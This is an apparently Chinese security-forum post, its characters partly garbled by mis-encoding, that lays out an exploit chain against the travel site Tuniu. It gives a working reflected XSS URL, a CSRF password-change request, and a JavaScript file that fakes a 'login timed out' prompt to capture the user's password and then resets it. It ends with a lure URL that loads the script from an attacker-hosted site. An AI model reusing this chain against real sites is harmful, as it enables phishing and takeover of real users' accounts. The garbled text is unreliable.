|
記得某次面試時候說起這個利用,但是面試官覺得不可行。我覺得居然用戶能被X也應(yīng)該有可能被釣,還是有可行性的。
1.jpg (47 KB, 下載次數(shù): 473)
下載附件
灰鴿子
2013-1-28 00:30 上傳
途牛網(wǎng)XSS+CSRF釣魚式重置用戶密碼 灰鴿子下載www.huigezi.org
1.某處XSS:http://m.tuniu.com/?action=route ... mp;pdate=<ScRiPt >prompt(/xss/)</ScRiPt>&todo=index
2.修改密碼處CSRF:http://www.tuniu.com/main.php?do=user_do_change_password&old=123456&new=password&pwd_s=1
3.創(chuàng)建外部JS:
2.jpg (13.72 KB, 下載次數(shù): 497)
下載附件
灰鴿子
2013-1-28 00:30 上傳
var pass;
pass=prompt("登陸超時,請重新輸入您的密碼","password");
url="http://www.tuniu.com/main.php?do=user_do_change_password&new=password&pwd_s=1&old="+pass;
window.location=url;
4.誘使用戶訪問
http://m.tuniu.com/?action=route&id=329846&pdate=<ScRiPt/src=//www.your-site.com/1.js></ScRiPt>&todo=index
若用戶輸入其正確密碼,JS內(nèi)CSRF將會將其密碼重置。
1表示重置成功,0表示重置失敗。
感覺還可以結(jié)合一些XSSbypass。
使用其他window彈窗使用戶輸入密碼密文*。
location跳轉(zhuǎn)也可以改得成其他靜默發(fā)送?
|
|